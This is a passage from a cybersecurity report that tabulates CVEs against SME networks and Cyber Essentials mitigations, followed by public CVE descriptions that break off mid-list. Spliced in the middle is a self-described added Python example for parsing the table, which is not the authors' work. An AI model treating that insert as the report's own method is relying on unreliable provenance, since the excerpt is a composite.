CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls (include anti-DOS)
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 16 of 28
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklisting, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
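The applicability table above records, per CVE, which of the four SME networks (and the idealised network) the vulnerability applied to, and which Cyber Essentials controls mitigate it. As an added example (not part of the report, and not the authors' own tooling), the Python below parses rows in the plain-text pipe layout used here and aggregates them: how often each control is credited with full or partial mitigation, per-network exposure, and the residual set of applicable CVEs that Cyber Essentials only partially mitigates. The embedded rows are a constructed sample copied from the table; the function names, the row layout and the splitting rule for multi-control cells are this example's own assumptions.

```python
"""Aggregate the Cyber Controls Applicability table (added example, not the report's code)."""
import re
from collections import Counter

# Constructed sample: rows copied from the applicability table above, in the
# same "CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE" layout.
SAMPLE_ROWS = """\
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
"""

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# Split a controls list on "," or "&" unless the separator sits inside
# parentheses, so "Secure Configuration (Secure Browser & Web Hosting)" stays whole.
_SEP = re.compile(r"[,&](?![^(]*\))")


def parse_row(line):
    """Parse one table row into a dict; raises ValueError on a malformed row."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8 or not cells[0].startswith("CVE-"):
        raise ValueError(f"malformed row: {line!r}")
    applies = {net: cells[i + 1] == "y" for i, net in enumerate(NETWORKS)}
    status, _, controls_text = cells[7].partition(" - ")
    controls = [c.strip() for c in _SEP.split(controls_text) if c.strip()]
    return {
        "cve": cells[0],
        "applies": applies,
        "no_ce": cells[6],
        "status": status.strip(),  # "Mitigated" or "Partially Mitigated"
        "controls": controls,
    }


def parse_table(text):
    """Parse every CVE row in a block of table text, skipping headers and blanks."""
    return [parse_row(line) for line in text.splitlines()
            if line.strip().startswith("CVE-")]


def control_counts(rows):
    """Counter keyed by (control, status): how often each control is credited."""
    counts = Counter()
    for r in rows:
        for c in r["controls"]:
            counts[(c, r["status"])] += 1
    return counts


def exposure(rows):
    """Per network: (applicable vulnerabilities, those CE fully mitigates)."""
    out = {}
    for net in NETWORKS:
        applicable = [r for r in rows if r["applies"][net]]
        fully = sum(1 for r in applicable if r["status"] == "Mitigated")
        out[net] = (len(applicable), fully)
    return out


def residual_risk(rows, network):
    """CVEs that apply to `network` but that CE only partially mitigates."""
    return [r["cve"] for r in rows
            if r["applies"][network] and r["status"] != "Mitigated"]


if __name__ == "__main__":
    rows = parse_table(SAMPLE_ROWS)
    for (control, status), n in sorted(control_counts(rows).items()):
        print(f"{control:45s} {status:20s} {n}")
    for net, (applicable, fully) in exposure(rows).items():
        print(f"{net}: {applicable} applicable, {fully} fully mitigated by CE")
    print("Residual risk on SME1:", residual_risk(rows, "SME1"))
```

Feeding the whole rebuilt table to `parse_table` instead of the sample reproduces the kind of per-control tally the report's analysis section draws on; rows whose With-CE cell carries a bracketed qualifier such as "[Time Delay]" keep that text attached to the last control, which is the right place for it when reading the counts.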
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
